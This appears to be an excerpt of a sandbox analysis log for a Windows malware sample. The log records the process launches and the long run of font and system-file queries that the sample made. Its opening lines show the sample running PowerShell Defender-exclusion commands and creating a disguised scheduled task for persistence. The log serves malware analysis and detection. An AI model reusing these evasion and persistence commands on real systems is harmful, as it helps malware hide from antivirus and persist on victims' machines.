            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\FqJXaFxwEj.exe
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exe
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\FqJXaFxwEj.exe
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeProcess created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\FqJXaFxwEj" /XML "C:\Users\user\AppData\Local\Temp\tmp4724.tmp
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeProcess created: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exe C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exe
            Source: C:\Users\user\AppData\Roaming\FqJXaFxwEj.exeProcess created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\FqJXaFxwEj" /XML "C:\Users\user\AppData\Local\Temp\tmp8C7A.tmp
            Source: C:\Users\user\AppData\Roaming\FqJXaFxwEj.exeProcess created: C:\Users\user\AppData\Roaming\FqJXaFxwEj.exe C:\Users\user\AppData\Roaming\FqJXaFxwEj.exe
            Source: C:\Users\user\AppData\Roaming\FqJXaFxwEj.exeProcess created: C:\Users\user\AppData\Roaming\FqJXaFxwEj.exe C:\Users\user\AppData\Roaming\FqJXaFxwEj.exe
            Source: explorer.exe, 0000000E.00000000.473602299.0000000000E50000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000E.00000000.444035794.0000000000E50000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000E.00000000.389456185.0000000000E50000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: EProgram Managerzx
            Source: explorer.exe, 0000000E.00000000.473602299.0000000000E50000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000E.00000000.484036893.000000000834F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000000.454888148.000000000834F000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Shell_TrayWnd
            Source: explorer.exe, 0000000E.00000000.473602299.0000000000E50000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000E.00000000.444035794.0000000000E50000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000E.00000000.389456185.0000000000E50000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
            Source: explorer.exe, 0000000E.00000000.443354268.00000000009C8000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000000.388566345.00000000009C8000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000000.473028657.00000000009C8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Progmanath
            Source: explorer.exe, 0000000E.00000000.473602299.0000000000E50000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000E.00000000.444035794.0000000000E50000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000E.00000000.389456185.0000000000E50000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exe VolumeInformation
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeQueries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeQueries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformation
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeQueries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformation
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeQueries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformation
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeQueries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformation
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeQueries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformation
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeQueries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeQueries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeQueries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeQueries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformation
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeQueries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformation
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeQueries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeQueries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeQueries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeQueries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeQueries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeQueries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeQueries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeQueries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeQueries volume information: C:\Windows\Fonts\consola.ttf VolumeInformation
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeQueries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformation
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeQueries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformation
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeQueries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformation
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeQueries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeQueries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeQueries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeQueries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeQueries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeQueries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeQueries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeQueries volume information: C:\Windows\Fonts\seguisb.ttf VolumeInformation
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeQueries volume information: C:\Windows\Fonts\segoeuii.ttf VolumeInformation
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeQueries volume information: C:\Windows\Fonts\seguisli.ttf VolumeInformation
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeQueries volume information: C:\Windows\Fonts\seguili.ttf VolumeInformation
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeQueries volume information: C:\Windows\Fonts\seguisbi.ttf VolumeInformation
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeQueries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformation
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeQueries volume information: C:\Windows\Fonts\seguibl.ttf VolumeInformation
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeQueries volume information: C:\Windows\Fonts\seguibli.ttf VolumeInformation
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeQueries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformation
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeQueries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformation
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformation
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformation
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeQueries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformation
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeQueries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformation
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeQueries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeQueries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformation
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeQueries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformation
